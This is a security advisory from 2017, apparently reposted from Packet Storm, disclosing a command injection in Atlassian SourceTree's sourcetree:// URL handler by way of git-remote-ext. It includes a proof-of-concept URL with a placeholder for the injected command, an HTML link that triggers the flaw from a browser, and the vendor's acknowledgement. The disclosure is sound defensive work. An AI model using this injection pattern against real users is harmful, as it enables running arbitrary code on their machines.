Atlassian SourceTree 2.5c Client URL Handler Command Injection

2017-05-04T00:00:00
ID PACKETSTORM:142393
Type packetstorm
Reporter redrain
Modified 2017-05-04T00:00:00

Description

                                        
                                            `  
Author: redrain, hongyu-s[at]360.cn  
Date: 2017-03-02  
Version:2.5c and prior  
Platform: macOS, Windows, Linux Desktop  
Site: https://www.sourcetreeapp.com  
Vendor: Atlassian  
Vendor Notified: 2017-03-02  
  
  
Technical Details:  
========================================  
  
SourceTree v2.5c and prior are affected by a command injection in the handling of sourcetree:// scheme.  
The cloneRepo action with !(r)ext!-is base on git-remote-ext, The git team's description of the bug was:  
Some protocols (like git-remote-ext) can execute arbitrary code found in the URL.  
PoC:  
sourcetree://cloneRepo/ext::[command injection]  
Even attacker can exploit it through the browser  
<html>  
<head></head>  
<body>  
<a href=sourcetree://checkoutRef/ext::id>a</a>  
</body>  
</html>  
There is a simple demo video:  
https://youtu.be/SQ1_Ht-0Bdo  
  
  
Other:  
============================================  
and there is the last bugtrack I reported:  
  
  
```  
Activity  
Your request status changed to Resolved with resolution Tracked Elsewhere.  
03/Mar/17 5:35 PMLATEST  
Alexander Minozhenko  
Alexander Minozhenko03/Mar/17 5:34 PM  
Hi rootredrain,  
Thank you for sending this notification to Atlassian. This is indeed a vulnerability and an issue has been filed on an internal tracker.  
The issue is SRCTREE-4632. Unfortunately, this issue is not accessible externally, so you will not be able to monitor its progress. Feel free to check with us for updates.  
redrain  
redrain02/Mar/17 5:43 PM  
sourcetree_vuln.7z (9.62 MB)  
Details02/Mar/17 5:43 PM  
Product or Service  
Other  
Product Version  
2.4.1a and earlier  
Description  
SourceTree v2.4.1a and earlier are affected by a command injection in the handling of sourcetree:// scheme.  
The cloneRepo action with !(r)ext!- is base on git-remote-ext, The git team!-s description of the bug was:  
Some protocols (like git-remote-ext) can execute arbitrary code found in the URL.  
PoC:  
sourcetree://cloneRepo/ext::[command injection]  
Even attacker can exploit it through the browser  
there is a simple demo in the attachment.  
  
  
Regards,  
redrain  
  
`